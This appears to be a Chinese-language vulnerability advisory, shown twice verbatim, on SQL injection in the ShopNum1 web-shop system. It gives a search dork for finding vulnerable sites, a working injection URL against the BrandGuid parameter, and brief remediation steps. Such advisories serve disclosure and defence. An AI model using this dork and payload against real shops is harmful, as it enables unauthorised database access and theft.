VULHUB ™

### 0x01 框架介绍 ShopNum1网店系统是武汉群翔软件有限公司自主研发的基于 WEB 应用的 B/S 架构的B2C网上商店系统，主要面向中高端客户， 为企业和大中型网商打造优秀的电子商务平台，ShopNum1运行于微软公司的 .NET 平台，采用最新的 ASP.NET 3.5技术进行分层开发。拥有更强的安全性、稳定性、易用性。 官方主页：www.shopnum1.com 影响厂商：武汉群翔软件有限公司 ### 0x02 漏洞利用 关键词：inurl:ProductListCategory.aspx BrandGuid参数过滤不严导致注入。  利用方式： http://site/ProductListCategory.aspx?ProductCategoryID=38&BrandGuid=18e018b8-c0c7-4f95-b1fc-0a15d36a8b7d' and 1=char(sys.fn_varbintohexstr(hashbytes('MD5','1'))) and '1'='1  Pocsuite证明：  ### 0x03 修复方案 1、过滤漏洞文件参数 2、使用加速乐等防护产品

### 0x01 框架介绍 ShopNum1网店系统是武汉群翔软件有限公司自主研发的基于 WEB 应用的 B/S 架构的B2C网上商店系统，主要面向中高端客户， 为企业和大中型网商打造优秀的电子商务平台，ShopNum1运行于微软公司的 .NET 平台，采用最新的 ASP.NET 3.5技术进行分层开发。拥有更强的安全性、稳定性、易用性。 官方主页：www.shopnum1.com 影响厂商：武汉群翔软件有限公司 ### 0x02 漏洞利用 关键词：inurl:ProductListCategory.aspx BrandGuid参数过滤不严导致注入。  利用方式： http://site/ProductListCategory.aspx?ProductCategoryID=38&BrandGuid=18e018b8-c0c7-4f95-b1fc-0a15d36a8b7d' and 1=char(sys.fn_varbintohexstr(hashbytes('MD5','1'))) and '1'='1  Pocsuite证明：  ### 0x03 修复方案 1、过滤漏洞文件参数 2、使用加速乐等防护产品